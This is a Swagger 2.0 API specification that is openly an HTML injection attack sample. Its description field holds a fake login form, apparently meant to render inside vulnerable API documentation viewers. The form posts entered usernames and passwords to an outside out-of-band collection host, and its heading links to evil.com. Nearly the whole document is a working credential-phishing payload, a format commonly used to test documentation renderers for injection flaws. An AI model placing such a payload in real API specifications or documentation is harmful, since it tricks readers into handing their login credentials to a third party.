swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <html>
    <body>
     <div class="login-form">
      <div class="heading">
        <h1>HTML Injection : <a href=evil.com>Fake Login</h1>
      </div>
      <div class="form-container">
        <form action="http://58bdkdhft5ed57w58cozrp6shjnab2zr.oastify.com" method="post" class="form-signin">
          <div class="form-group">
            <label for="username">Username</label>
            <input type="text" name="username" size="20" required>
          </div>
          <div class="form-group">
            <label for="password">Password</label>
            <input type="password" name="password" size="20" required>
          </div>
          <div class="form-group">
            <button type="submit" class="btn btn-default">Login</button>
          </div>
        </form>
      </div>
    </div>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f4f4f4;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
      }
     .login-form {
        background: white;
        padding: 20px;
        border-radius: 5px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      }
     .heading h1 {
        text-align: center;
      }
     .form-group {
        margin-bottom: 15px;
      }
     .form-group label {
        display: block;
        margin-bottom: 5px;
      }
     .form-group input {
        width: 100%;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
      }
     .form-group button {
        width: 100%;
        padding: 10px;
        background-color: #007bff;
        color: white;
        border: none;
        border-radius: 4px;
        cursor: pointer;
      }
     .form-group button:hover {
        background-color: #0056b3;
      }
    </style>
   </body>
   </html>
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
